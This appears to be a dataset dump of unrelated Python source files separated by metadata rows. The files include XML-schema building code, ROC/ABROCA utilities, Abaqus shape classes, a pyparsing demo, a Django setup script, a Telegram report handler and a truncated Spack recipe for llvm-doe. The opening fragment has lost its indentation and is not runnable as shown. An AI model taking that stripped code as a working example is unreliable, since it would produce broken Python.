element_class = meta_schema.BUILDERS.element_class
for schema in not_built_schemas:
for group in schema.iter_components(XsdGroup):
for k in range(len(group)):
if isinstance(group[k], tuple):
elem, schema = group[k]
group[k] = element_class(elem, schema, group)
for schema in not_built_schemas:
# Build substitution groups from global element declarations
for xsd_element in schema.elements.values():
if xsd_element.substitution_group:
qname = prefixed_to_qname(xsd_element.substitution_group, xsd_element.schema.namespaces)
if xsd_element.type.name == XSD_ANY_TYPE and 'type' not in xsd_element.elem.attrib:
xsd_element.type = self.elements[qname].type
try:
self.substitution_groups[qname].add(xsd_element)
except KeyError:
self.substitution_groups[qname] = {xsd_element}
if schema.meta_schema is not None:
# Set referenced key/unique constraints for keyrefs
for constraint in schema.iter_components(XsdKeyref):
constraint.parse_refer()
# Check for illegal restrictions
# TODO: Fix for XsdGroup.is_restriction() method is needed before enabling this check
# if schema.validation != 'skip':
# for xsd_type in schema.iter_components(XsdComplexType):
# xsd_type.check_restriction()
if self.validation == 'strict' and not self.built:
raise XMLSchemaNotBuiltError(self, "global map %r not built!" % self)
| 39.763158
| 110
| 0.623248
|
f447193318e57cff7fedcdd94df2bd45b6e41805
| 3,229
|
py
|
Python
|
abroca/utils.py
|
VaibhavKaushik3220/abroca
|
6dd11e83c089798738cfe2532716ba8585d1292a
|
[
"MIT"
] | null | null | null |
abroca/utils.py
|
VaibhavKaushik3220/abroca
|
6dd11e83c089798738cfe2532716ba8585d1292a
|
[
"MIT"
] | null | null | null |
abroca/utils.py
|
VaibhavKaushik3220/abroca
|
6dd11e83c089798738cfe2532716ba8585d1292a
|
[
"MIT"
] | 2
|
2020-10-27T00:54:34.000Z
|
2021-08-16T17:37:39.000Z
|
import numpy as np
import sklearn.metrics as metrics
from scipy import interpolate
import matplotlib.pyplot as plt
def compute_roc(y_scores, y_true):
"""
Function to compute the Receiver Operating Characteristic (ROC) curve for a set of predicted probabilities and the true class labels.
y_scores - vector of predicted probability of being in the positive class P(X == 1) (numeric)
y_true - vector of true labels (numeric)
Returns FPR and TPR values
"""
fpr, tpr, _ = metrics.roc_curve(y_true, y_scores)
return fpr, tpr
def compute_auc(y_scores, y_true):
"""
    Function to compute the Area Under the Receiver Operating Characteristic Curve (AUC).
y_scores - vector of predicted probability of being in the positive class P(X == 1) (numeric)
y_true - vector of true labels (numeric)
Returns AUC value
"""
auc = metrics.roc_auc_score(y_true, y_scores)
return auc
def interpolate_roc_fun(fpr, tpr, n_grid):
"""
    Function that uses interpolation to approximate the Receiver Operating Characteristic (ROC) curve along n_grid equally-spaced values.
fpr - vector of false positive rates computed from compute_roc
tpr - vector of true positive rates computed from compute_roc
n_grid - number of approximation points to use (default value of 10000 more than adequate for most applications) (numeric)
    Returns arrays x and y containing n_grid coordinates that interpolate the given data points.
"""
roc_approx = interpolate.interp1d(x=fpr, y=tpr)
x_new = np.linspace(0, 1, num=n_grid)
y_new = roc_approx(x_new)
return x_new, y_new
def slice_plot(
majority_roc_fpr,
minority_roc_fpr,
majority_roc_tpr,
minority_roc_tpr,
majority_group_name="baseline",
minority_group_name="comparison",
fout="./slice_plot.png",
):
"""
Function to create a 'slice plot' of two roc curves with area between them (the ABROCA region) shaded.
majority_roc_fpr, minority_roc_fpr - FPR of majority and minority groups
majority_roc_tpr, minority_roc_tpr - TPR of majority and minority groups
majority_group_name - (optional) - majority group display name on the slice plot
minority_group_name - (optional) - minority group display name on the slice plot
fout - (optional) - File name (including directory) to save the slice plot generated
No return value; displays slice plot & file is saved to disk
"""
plt.figure(1, figsize=(6, 5))
plt.title("ABROCA - Slice Plot")
plt.xlabel("False Positive Rate")
plt.ylabel("True Positive Rate")
plt.plot(
majority_roc_fpr,
majority_roc_tpr,
label="{o} - Baseline".format(o=majority_group_name),
linestyle="-",
color="r",
)
plt.plot(
minority_roc_fpr,
minority_roc_tpr,
label="{o} - Comparison".format(o=minority_group_name),
linestyle="-",
color="b",
)
plt.fill(
majority_roc_fpr.tolist() + np.flipud(minority_roc_fpr).tolist(),
majority_roc_tpr.tolist() + np.flipud(minority_roc_tpr).tolist(),
"y",
)
plt.legend()
plt.savefig(fout)
plt.show()
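# Illustrative end-to-end check (not part of the original module): compute two
# ROC curves from synthetic scores, interpolate both onto a shared FPR grid
# with the helpers above, and integrate the absolute gap between them, which
# is the ABROCA statistic that slice_plot shades. Uses only names defined in
# this file plus numpy.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    y_true = rng.randint(0, 2, size=500)
    scores_a = np.clip(0.4 * y_true + 0.6 * rng.rand(500), 0.0, 1.0)
    scores_b = np.clip(0.2 * y_true + 0.8 * rng.rand(500), 0.0, 1.0)
    fpr_a, tpr_a = compute_roc(scores_a, y_true)
    fpr_b, tpr_b = compute_roc(scores_b, y_true)
    grid, tpr_a_interp = interpolate_roc_fun(fpr_a, tpr_a, 10000)
    _, tpr_b_interp = interpolate_roc_fun(fpr_b, tpr_b, 10000)
    print("ABROCA:", np.trapz(np.abs(tpr_a_interp - tpr_b_interp), grid))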
| 35.877778
| 153
| 0.697739
|
7ce14303119b354dc73b4af2b1bf742cb03d8d78
| 13,873
|
py
|
Python
|
f3dasm/abaqus/geometry/shapes.py
|
bessagroup/F3DASM
|
916f706f4f206c59cb53b9116660d3a194755c33
|
[
"BSD-3-Clause"
] | 26
|
2020-11-26T14:35:25.000Z
|
2022-02-24T14:00:27.000Z
|
f3dasm/abaqus/geometry/shapes.py
|
yuanquan010/F3DASM
|
1919caf53338534963fb25f76c417fd10ab7628f
|
[
"BSD-3-Clause"
] | 19
|
2021-02-28T16:06:30.000Z
|
2022-03-12T01:02:29.000Z
|
f3dasm/abaqus/geometry/shapes.py
|
yuanquan010/F3DASM
|
1919caf53338534963fb25f76c417fd10ab7628f
|
[
"BSD-3-Clause"
] | 8
|
2020-10-09T19:10:13.000Z
|
2022-03-10T16:26:50.000Z
|
'''
Created on 2020-10-15 09:36:46
Last modified on 2020-11-26 12:49:39
@author: L. F. Pereira (lfpereira@fe.up.pt))
'''
# imports
# abaqus
from caeModules import * # allow noGui
from abaqusConstants import (DEFORMABLE_BODY, THREE_D, ON, COUNTERCLOCKWISE,
CLOCKWISE, YZPLANE, XYPLANE, XZPLANE, SIDE1, LINE)
# standard library
import copy
from abc import ABCMeta
import math
# local library
from .base import Geometry
# abstract object
class MicroShape(Geometry):
__metaclass__ = ABCMeta
def __init__(self, name, material=None, default_mesh=False):
super(MicroShape, self).__init__(default_mesh=default_mesh)
self.name = name
self.material = material
def draw_in_sketch(self, sketch):
'''
Perform operations in main sketch.
'''
pass
def make_partition(self, model, tmp_part):
pass
class PeriodicBall(MicroShape):
__metaclass__ = ABCMeta
def __init__(self, name, r, center, tol=1e-4, bounds=None, material=None):
super(PeriodicBall, self).__init__(name, material, default_mesh=False)
self.r = r
self.tol = tol
self.bounds = bounds
# initialize variables
self.particles = []
# create required particles
self.add_center(center)
def _center_exists(self, cmp_center):
exists = False
d = len(cmp_center)
for particle in self.particles:
center = particle.center
k = 0
for elem_center, elem_cmpcenter in zip(center, cmp_center):
if abs(elem_center - elem_cmpcenter) < self.tol:
k += 1
if k == d:
exists = True
break
return exists
def _is_inside(self, center):
dist_squared = self.r**2
for (c, bounds) in zip(center, self.bounds):
if c < bounds[0]:
dist_squared -= (c - bounds[0])**2
elif c > bounds[1]:
dist_squared -= (c - bounds[1])**2
return dist_squared > 0
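    # The test above is the standard ball/axis-aligned-box overlap check: for
    # each axis it subtracts the squared distance from the center to the box
    # along that axis, so the ball intersects the box iff the remaining
    # squared radius stays positive. E.g. (illustrative) r = 1 with a center
    # 0.5 beyond one face leaves 1 - 0.25 = 0.75 > 0, i.e. still overlapping.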
def add_center(self, center):
if self._center_exists(center) or (self.bounds is not None and not self._is_inside(center)):
return
else:
self._add_particle(center)
for i, (pos_center, bounds) in enumerate(zip(center, self.bounds)):
dim = bounds[1] - bounds[0]
if (pos_center + self.r) > bounds[1]:
new_center = copy.copy(center)
new_center[i] -= dim
self.add_center(new_center)
elif (pos_center - self.r) < bounds[0]:
new_center = copy.copy(center)
new_center[i] += dim
self.add_center(new_center)
def _get_name(self):
return '{}_{}'.format(self.name, len(self.particles))
# concrete shapes
class PeriodicSphere(PeriodicBall):
def _add_particle(self, center):
name = self._get_name()
self.particles.append(Sphere(name=name, r=self.r, center=center, tol=self.tol,
bounds=self.bounds, material=self.material))
def create_part(self, model):
parts = []
for particle in self.particles:
parts.append(particle.create_part(model))
return parts
def create_instance(self, model):
instances = []
for particle in self.particles:
instances.append(particle.create_instance(model))
return instances
def generate_mesh(self):
for particle in self.particles:
particle.generate_mesh()
class PeriodicCircle(PeriodicBall):
def _add_particle(self, center):
name = self._get_name()
self.particles.append(Circle(name=name, r=self.r, center=center,
tol=self.tol, bounds=self.bounds,
material=self.material))
def draw_in_sketch(self, sketch):
for particle in self.particles:
particle.draw_in_sketch(sketch)
def make_partition(self, model, tmp_part):
# verification
if self.material is None:
return False
# create partitions
for particle in self.particles:
particle.make_partition(model, tmp_part)
return True
def get_region(self, tmp_part):
return [particle.get_region(tmp_part) for particle in self.particles]
class Sphere(MicroShape):
def __init__(self, r, center, tol=1e-4, name='SPHERE',
bounds=(), material=None):
'''
Parameters
----------
bounds : array-like e.g. ((x_min, x_max), (y_min, y_max))
            Bounds of e.g. the RVE. The sphere is cut to be contained within the
bounds.
'''
super(Sphere, self).__init__(name, material)
self.r = r
self.center = center
self.tol = tol
self.bounds = bounds
def create_part(self, model):
# sketch
sketch = self._create_sketch(model)
# part
self.part = model.Part(name=self.name, dimensionality=THREE_D,
type=DEFORMABLE_BODY)
self.part.BaseSolidRevolve(sketch=sketch, angle=360.,)
# partitions for meshing
self._create_partitions()
# remove cells
if self._is_to_remove_cells():
self._remove_cells()
# assign section
if self.material is not None:
self._assign_section(region=(self.part.cells,))
return self.part
def _create_sketch(self, model):
a, b = self.center[1] + self.r, self.center[1] - self.r
# sketch
sketch = model.ConstrainedSketch(name=self.name + '_PROFILE',
sheetSize=2 * self.r)
sketch.ConstructionLine(point1=(self.center[0], self.r),
point2=(self.center[0], -self.r))
sketch.ArcByCenterEnds(center=self.center[:2],
point1=(self.center[0], a),
point2=(self.center[0], b), direction=CLOCKWISE)
sketch.Line(point1=(self.center[0], a), point2=(self.center[0], b))
return sketch
def create_instance(self, model):
instance = model.rootAssembly.Instance(name=self.name,
part=self.part, dependent=ON)
instance.translate(vector=(0., 0., self.center[2]))
return instance
def _create_partitions(self):
planes = [YZPLANE, XZPLANE, XYPLANE]
for c, plane in zip(self.center, planes):
offset = c if plane is not XYPLANE else 0.
feature = self.part.DatumPlaneByPrincipalPlane(principalPlane=plane,
offset=offset)
datum = self.part.datums[feature.id]
self.part.PartitionCellByDatumPlane(datumPlane=datum, cells=self.part.cells)
def _is_to_remove_cells(self):
for bounds, c in zip(self.bounds, self.center):
if c - self.r < bounds[0] or c + self.r > bounds[1]:
return True
return False
    def _remove_cells(self):
# initialization
planes = [YZPLANE, XZPLANE, XYPLANE]
variables = ['x', 'y', 'z']
# delete cells
for i in range(3):
# partition position
if (self.center[i] + self.r) > self.bounds[i][1]:
sign = 1
elif (self.center[i] - self.r) < self.bounds[i][0]:
sign = -1
else:
continue
# partition by datum
if sign > 0:
x_max = self.bounds[i][1] if i != 2 else self.bounds[i][1] - self.center[i]
else:
x_max = self.bounds[i][0] if i != 2 else self.bounds[i][0] - self.center[i]
feature = self.part.DatumPlaneByPrincipalPlane(principalPlane=planes[i],
offset=x_max)
datum = self.part.datums[feature.id]
try:
self.part.PartitionCellByDatumPlane(datumPlane=datum, cells=self.part.cells)
            except Exception:  # in case the partition already exists
pass
var_name = '{}Max'.format(variables[i]) if sign == -1 else '{}Min'.format(variables[i])
kwargs = {var_name: x_max}
faces = self.part.faces.getByBoundingBox(**kwargs)
faces_to_delete = []
for face in faces:
if abs(face.getNormal()[i]) != 1.0 or (sign == 1 and face.pointOn[0][i] - self.tol > x_max) or (sign == -1 and face.pointOn[0][i] + self.tol < x_max):
faces_to_delete.append(face)
# remove faces
try:
self.part.RemoveFaces(faceList=faces_to_delete, deleteCells=False)
            except Exception:  # in case faces were already removed
pass
class Circle(MicroShape):
def __init__(self, r, center, tol=1e-4, name='CIRCLE', bounds=(), material=None):
'''
Parameters
----------
bounds : array-like e.g. ((x_min, x_max), (y_min, y_max))
            Bounds of e.g. the RVE. The circle is cut to be contained within the
bounds.
'''
super(Circle, self).__init__(name, material)
self.r = r
self.center = center
self.tol = tol
self.bounds = bounds
def draw_in_sketch(self, sketch):
# verification
if self.material is not None:
return
# draw in sketch
if self._is_to_remove_cells():
self._draw_partial_arc(sketch)
else:
self._draw_circle(sketch)
def _draw_circle(self, sketch):
pt = (self.center[0] + self.r, self.center[1])
sketch.CircleByCenterPerimeter(center=self.center, point1=pt)
def _draw_partial_arc(self, sketch):
'''
Notes
-----
        Vertices cannot be cut (otherwise it will mess up the application of the
boundary conditions).
'''
# get intersection points
inter_pts = self._get_intersection_pts()
# find right points order
if inter_pts[0][0] == self.bounds[0][0] or inter_pts[0][1] == self.bounds[1][1]:
inter_pts[0], inter_pts[1] = inter_pts[1], inter_pts[0]
# draw circle
arc = sketch.ArcByCenterEnds(center=self.center, point1=inter_pts[0],
point2=inter_pts[1],
direction=COUNTERCLOCKWISE)
# create breakpoints
for pt in inter_pts:
# find line (findAt sometimes finds ARC)
geom = [g for g in sketch.geometry.values() if g.curveType == LINE]
for g in geom:
vertices = g.getVertices()
v1, v2 = vertices[0].coords, vertices[1].coords
index = 1 if v1[0] == v2[0] else 0
cpl_index = 0 if v1[0] == v2[0] else 1
lv, rv = min(v1[index], v2[index]), max(v1[index], v2[index])
if pt[cpl_index] == v1[cpl_index] and lv <= pt[index] <= rv:
line = g
break
# break line
sketch.breakCurve(curve1=line, curve2=arc, point1=pt, point2=pt)
# delete curves
geom = [g for g in sketch.geometry.values() if g.curveType == LINE]
for g in geom:
v1, v2 = g.getVertices()
if v1.coords in inter_pts and v2.coords in inter_pts:
sketch.delete((g,))
break
def _is_to_remove_cells(self):
for bounds, c in zip(self.bounds, self.center):
if c - self.r < bounds[0] or c + self.r > bounds[1]:
return True
return False
def _get_intersection_pts(self):
# initialization
xc, yc = self.center
pts = []
# in vertical edges
for x in self.bounds[0]:
aux = self.r**2 - (x - xc)**2
if aux >= 0.:
ys1 = math.sqrt(aux) + yc
ys2 = -math.sqrt(aux) + yc
if ys1 < self.bounds[1][1]:
pts.append((x, ys1))
if ys2 > self.bounds[1][0]:
pts.append((x, ys2))
# in horizontal edges
for y in self.bounds[1]:
aux = self.r**2 - (y - yc)**2
if aux >= 0.:
xs1 = math.sqrt(aux) + xc
xs2 = -math.sqrt(aux) + xc
if xs1 < self.bounds[0][1]:
pts.append((xs1, y))
if xs2 > self.bounds[0][0]:
pts.append((xs2, y))
return pts
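    # Worked example for the intersection above (illustrative): with
    # center = (0, 0), r = 1 and bounds = ((-0.5, 2), (-2, 2)), only the
    # vertical edge x = -0.5 intersects the circle, at
    # y = +/- sqrt(1 - 0.25) ~= +/- 0.866, so pts holds exactly those two
    # points and _draw_partial_arc keeps the arc between them.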
def make_partition(self, model, part):
# verification
if self.material is None:
return False
# create sketch
face = part.faces[0]
transf_sketch = part.MakeSketchTransform(sketchPlane=face, sketchPlaneSide=SIDE1,
origin=[0., 0., 0.])
sketch = model.ConstrainedSketch(name=self.name, sheetSize=2 * self.r,
transform=transf_sketch)
# draw in sketch
pt = (self.center[0] + self.r, self.center[1])
sketch.CircleByCenterPerimeter(center=self.center, point1=pt)
# partition sketch
part.PartitionFaceBySketch(faces=part.faces, sketch=sketch)
# assign material
region = self.get_region(part)
self._assign_section(part=part, region=region)
return True
def get_region(self, part):
center1 = list(self.center) + [0.]
center2 = list(self.center) + [1.]
faces = part.faces.getByBoundingCylinder(center1, center2, self.r + self.tol)
return (faces[0],)
| 32.187935
| 166
| 0.545664
|
e07d5183b3541b3b52780f3901f00453b2744bb9
| 1,027
|
py
|
Python
|
pyparsing-2.0.1/examples/tagCapture.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | 1
|
2018-05-30T22:21:30.000Z
|
2018-05-30T22:21:30.000Z
|
pyparsing-2.0.1/examples/tagCapture.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
pyparsing-2.0.1/examples/tagCapture.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
#
# tagCapture.py
#
# Simple demo showing how to match HTML tags
#
from pyparsing import *
src = "this is test <b> bold <i>text</i> </b> normal text "
def matchingCloseTag(other):
ret = Forward()
ret << anyCloseTag.copy()
def setupMatchingClose(tokens):
opentag = tokens[0]
def mustMatch(tokens):
if tokens[0][0].strip('<>/') != opentag:
raise ParseException("",0,"")
ret.setParseAction(mustMatch)
other.addParseAction(setupMatchingClose)
return ret
for m in originalTextFor(anyOpenTag + SkipTo(matchingCloseTag(anyOpenTag),
include=True,
failOn=anyOpenTag) ).searchString(src):
print(m.dump())
for m in originalTextFor(anyOpenTag + SkipTo(matchingCloseTag(anyOpenTag),
include=True) ).searchString(src):
print(m.dump())
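# Expected behavior (illustrative): with failOn=anyOpenTag the <b> match is
# aborted when the nested <i> appears before </b>, so the first loop should
# report only '<i>text</i>'; without failOn, the second loop should report
# the full '<b> bold <i>text</i> </b>' span.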
| 28.527778
| 86
| 0.525803
|
e0c11f2c1d45cab855f0407252cbaccae045d935
| 124
|
py
|
Python
|
utils/test.py
|
wisesky/LeetCode-Practice
|
65549f72c565d9f11641c86d6cef9c7988805817
|
[
"MIT"
] | null | null | null |
utils/test.py
|
wisesky/LeetCode-Practice
|
65549f72c565d9f11641c86d6cef9c7988805817
|
[
"MIT"
] | null | null | null |
utils/test.py
|
wisesky/LeetCode-Practice
|
65549f72c565d9f11641c86d6cef9c7988805817
|
[
"MIT"
] | null | null | null |
while True:
try:
s = input()
# s = 'haha'
print(s)
    except:
# print(e)
break
| 15.5
| 20
| 0.370968
|
2128ea84c292055709931dd8ef57230bb9214ca9
| 1,269
|
py
|
Python
|
packages/django_weixin/setup.py
|
tolerious/django-weixin
|
18f3f2d5d8377c7dde8700afc5977861c8488b68
|
[
"MIT"
] | null | null | null |
packages/django_weixin/setup.py
|
tolerious/django-weixin
|
18f3f2d5d8377c7dde8700afc5977861c8488b68
|
[
"MIT"
] | null | null | null |
packages/django_weixin/setup.py
|
tolerious/django-weixin
|
18f3f2d5d8377c7dde8700afc5977861c8488b68
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Created on 04 11, 2016
@author: tolerious
'''
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-weixin',
version='0.1.6',
packages=['django_weixin'],
include_package_data=True,
license='MIT License', # example license
description='A simple Django application to implementation Wechat API.',
long_description=README,
url='http://tobe.engineer/',
author='tolerious',
author_email='tolerious@qq.com',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License', # example license
'Operating System :: OS Independent',
'Programming Language :: Python',
# Replace these appropriately if you are stuck on Python 2.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| 29.511628
| 78
| 0.639874
|
2940ef0d442b48b0431ab0435a056931cd3c447c
| 316
|
py
|
Python
|
testing/code/odf_tarball/examples/quick_write_gzip.py
|
ageller/iceCubeTest
|
1cf74f0f225c8ab60820835cc5eee49cad586277
|
[
"MIT"
] | null | null | null |
testing/code/odf_tarball/examples/quick_write_gzip.py
|
ageller/iceCubeTest
|
1cf74f0f225c8ab60820835cc5eee49cad586277
|
[
"MIT"
] | null | null | null |
testing/code/odf_tarball/examples/quick_write_gzip.py
|
ageller/iceCubeTest
|
1cf74f0f225c8ab60820835cc5eee49cad586277
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from event import Event
from fileio import write
import gzip
f = gzip.open("test.odf.gz","wb")
ev = Event()
ev.runID = 1009322
ev.year = 2007
ev.startTime = long(10908290809370)
ev.eventLength = 100000.
ev.triggers = [(10000.00,"BLEH")]
ev.hits = [(1.0,1000.4,100.,-100.,255.)]
write(f,ev)
| 17.555556
| 40
| 0.683544
|
ad0d0e8d19e6b022f1145654275f95354cf0f04d
| 816
|
py
|
Python
|
handlers/groups/report.py
|
jtprog/gendalf_bot
|
aebdaf52f9af3b1307eb1962b16d2e9fd04dd51f
|
[
"WTFPL"
] | null | null | null |
handlers/groups/report.py
|
jtprog/gendalf_bot
|
aebdaf52f9af3b1307eb1962b16d2e9fd04dd51f
|
[
"WTFPL"
] | 1
|
2021-09-12T17:38:29.000Z
|
2021-09-12T17:38:29.000Z
|
handlers/groups/report.py
|
jtprog/gendalf_bot
|
aebdaf52f9af3b1307eb1962b16d2e9fd04dd51f
|
[
"WTFPL"
] | null | null | null |
from aiogram import types
from aiogram.dispatcher.filters.builtin import Command
from loader import dp
from data.config import MASTER_ADMIN_ID
@dp.message_handler(Command(["report"]))
async def user_bot_help(message: types.Message):
"""
    Send a message to the chat and to the admin's DMs reporting that someone is being a jerk.
"""
from_name = message.from_user.username
username = message.reply_to_message.from_user.username
text = [
        f'User <a href="https://t.me/@{from_name}">{from_name}</a>\n',
        f'says the jerk here is <a href="https://t.me/@{username}">{username}</a>',
]
await message.answer(text="\n".join(text), parse_mode=types.ParseMode.HTML)
await message.bot.send_message(
chat_id=MASTER_ADMIN_ID, text="\n".join(text), parse_mode=types.ParseMode.HTML
)
| 35.478261
| 86
| 0.702206
|
0af4a2b0f2f22747eef69233c80007ff63782781
| 20,411
|
py
|
Python
|
var/spack/repos/builtin/packages/llvm-doe/package.py
|
klevzoff/spack
|
396936d24173254ecf4148bc460702185e4c99e5
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2019-02-10T13:47:48.000Z
|
2019-04-17T13:05:17.000Z
|
var/spack/repos/builtin/packages/llvm-doe/package.py
|
klevzoff/spack
|
396936d24173254ecf4148bc460702185e4c99e5
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 17
|
2019-03-21T15:54:00.000Z
|
2022-03-29T19:34:28.000Z
|
var/spack/repos/builtin/packages/llvm-doe/package.py
|
klevzoff/spack
|
396936d24173254ecf4148bc460702185e4c99e5
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2018-04-06T09:04:11.000Z
|
2020-01-24T12:52:12.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os.path
import re
import sys
import llnl.util.tty as tty
import spack.util.executable
class LlvmDoe(CMakePackage, CudaPackage):
"""This package provides a collection of the experimental LLVM projects done
by the US DOE research and development teams.
"""
homepage = "https://github.com/llvm-doe-org"
url = "https://github.com/llvm-doe-org/llvm-project/archive/llvmorg-10.0.0.zip"
git = "https://github.com/llvm-doe-org/llvm-project"
maintainers = ['shintaro-iwasaki']
version('doe', branch='doe', preferred=True)
version('upstream', branch='llvm.org/main')
version('bolt', branch='bolt/main')
version('clacc', branch='clacc/master')
version('pragma-clang-loop', branch='sollve/pragma-clang-loop')
version('pragma-omp-tile', branch='sollve/pragma-omp-tile')
# NOTE: The debug version of LLVM is an order of magnitude larger than
# the release version, and may take up 20-30 GB of space. If you want
# to save space, build with `build_type=Release`.
variant(
"clang",
default=True,
description="Build the LLVM C/C++/Objective-C compiler frontend",
)
variant(
"flang",
default=False,
description="Build the LLVM Fortran compiler frontend",
)
variant(
"omp_debug",
default=False,
description="Include debugging code in OpenMP runtime libraries",
)
variant("lldb", default=False, description="Build the LLVM debugger")
variant("lld", default=True, description="Build the LLVM linker")
variant("mlir", default=False, description="Build with MLIR support")
variant(
"internal_unwind",
default=True,
description="Build the libcxxabi libunwind",
)
variant(
"polly",
default=True,
description="Build the LLVM polyhedral optimization plugin, "
"only builds for 3.7.0+",
)
variant(
"libcxx",
default=True,
description="Build the LLVM C++ standard library",
)
variant(
"compiler-rt",
default=True,
description="Build LLVM compiler runtime, including sanitizers",
)
variant(
"gold",
default=(sys.platform != "darwin"),
description="Add support for LTO with the gold linker plugin",
)
variant(
"split_dwarf",
default=False,
description="Build with split dwarf information",
)
variant(
"shared_libs",
default=False,
description="Build all components as shared libraries, faster, "
"less memory to build, less stable",
)
variant(
"llvm_dylib",
default=False,
description="Build LLVM shared library, containing all "
"components in a single shared library",
)
variant(
"all_targets",
default=False,
description="Build all supported targets, default targets "
"<current arch>,NVPTX,AMDGPU,CppBackend",
)
variant(
"build_type",
default="Release",
description="CMake build type",
values=("Debug", "Release", "RelWithDebInfo", "MinSizeRel"),
)
variant(
"omp_tsan",
default=False,
description="Build with OpenMP capable thread sanitizer",
)
variant(
"argobots",
default=False,
description="Build BOLT/OpenMP with Argobots. Effective when @bolt",
)
variant('code_signing', default=False,
description="Enable code-signing on macOS")
variant("python", default=False, description="Install python bindings")
extends("python", when="+python")
# Build dependency
depends_on("cmake@3.4.3:", type="build")
depends_on("python", when="~python", type="build")
depends_on("pkgconfig", type="build")
# Universal dependency
depends_on("python", when="+python")
depends_on("z3")
# openmp dependencies
depends_on("perl-data-dumper", type=("build"))
depends_on("hwloc")
depends_on("libelf", when="+cuda") # libomptarget
depends_on("libffi", when="+cuda") # libomptarget
# ncurses dependency
depends_on("ncurses+termlib")
# lldb dependencies
depends_on("swig", when="+lldb")
depends_on("libedit", when="+lldb")
depends_on("py-six", when="+lldb +python")
# gold support, required for some features
depends_on("binutils+gold", when="+gold")
conflicts("+llvm_dylib", when="+shared_libs")
conflicts("+lldb", when="~clang")
conflicts("+libcxx", when="~clang")
conflicts("+internal_unwind", when="~clang")
conflicts("+compiler-rt", when="~clang")
conflicts("%gcc@:5.0.999")
# cuda_arch value must be specified
conflicts("cuda_arch=none", when="+cuda", msg="A value for cuda_arch must be specified.")
conflicts("+mlir")
conflicts("+flang", when="~clang")
    # code signing is only necessary on macOS
conflicts('+code_signing', when='platform=linux')
conflicts('+code_signing', when='platform=cray')
conflicts(
'+code_signing',
when='~lldb platform=darwin',
msg="code signing is only necessary for building the "
"in-tree debug server on macOS. Turning this variant "
"off enables a build of llvm with lldb that uses the "
"system debug server",
)
# LLVM bug https://bugs.llvm.org/show_bug.cgi?id=48234
# CMake bug: https://gitlab.kitware.com/cmake/cmake/-/issues/21469
# Fixed in upstream versions of both
conflicts('^cmake@3.19.0', when='@:11.0.0')
# Backport from llvm master + additional fix
# see https://bugs.llvm.org/show_bug.cgi?id=39696
# for a bug report about this problem in llvm master.
patch("constexpr_longdouble_9.0.patch", when="@9:10.0.0+libcxx")
# https://github.com/spack/spack/issues/19625,
# merged in llvm-11.0.0_rc2
patch("lldb_external_ncurses-10.patch", when="@10.0.0:10.99+lldb")
# https://github.com/spack/spack/issues/19908
# merged in llvm main prior to 12.0.0
patch("llvm_python_path.patch", when="@11.0.0")
# The functions and attributes below implement external package
# detection for LLVM. See:
#
# https://spack.readthedocs.io/en/latest/packaging_guide.html#making-a-package-discoverable-with-spack-external-find
executables = ['clang', 'flang', 'ld.lld', 'lldb']
@classmethod
def filter_detected_exes(cls, prefix, exes_in_prefix):
result = []
for exe in exes_in_prefix:
# Executables like lldb-vscode-X are daemon listening
# on some port and would hang Spack during detection.
# clang-cl and clang-cpp are dev tools that we don't
# need to test
if any(x in exe for x in ('vscode', 'cpp', '-cl', '-gpu')):
continue
result.append(exe)
return result
@classmethod
def determine_version(cls, exe):
version_regex = re.compile(
# Normal clang compiler versions are left as-is
r'clang version ([^ )\n]+)-svn[~.\w\d-]*|'
# Don't include hyphenated patch numbers in the version
# (see https://github.com/spack/spack/pull/14365 for details)
r'clang version ([^ )\n]+?)-[~.\w\d-]*|'
r'clang version ([^ )\n]+)|'
# LLDB
r'lldb version ([^ )\n]+)|'
# LLD
r'LLD ([^ )\n]+) \(compatible with GNU linkers\)'
)
try:
compiler = Executable(exe)
output = compiler('--version', output=str, error=str)
if 'Apple' in output:
return None
match = version_regex.search(output)
if match:
return match.group(match.lastindex)
except spack.util.executable.ProcessError:
pass
except Exception as e:
tty.debug(e)
return None
@classmethod
def determine_variants(cls, exes, version_str):
variants, compilers = ['+clang'], {}
lld_found, lldb_found = False, False
for exe in exes:
if 'clang++' in exe:
compilers['cxx'] = exe
elif 'clang' in exe:
compilers['c'] = exe
elif 'flang' in exe:
variants.append('+flang')
                compilers['fc'] = exe
compilers['f77'] = exe
elif 'ld.lld' in exe:
lld_found = True
compilers['ld'] = exe
elif 'lldb' in exe:
lldb_found = True
compilers['lldb'] = exe
variants.append('+lld' if lld_found else '~lld')
variants.append('+lldb' if lldb_found else '~lldb')
return ''.join(variants), {'compilers': compilers}
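    # Illustrative example of the detection above: for
    # exes = ['/usr/bin/clang', '/usr/bin/clang++', '/usr/bin/ld.lld'] this
    # returns ('+clang+lld~lldb', {'compilers': {'c': ..., 'cxx': ...,
    # 'ld': ...}}), i.e. a variant string plus the extra compiler attributes
    # validated by validate_detected_spec below.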
@classmethod
def validate_detected_spec(cls, spec, extra_attributes):
# For LLVM 'compilers' is a mandatory attribute
msg = ('the extra attribute "compilers" must be set for '
'the detected spec "{0}"'.format(spec))
assert 'compilers' in extra_attributes, msg
compilers = extra_attributes['compilers']
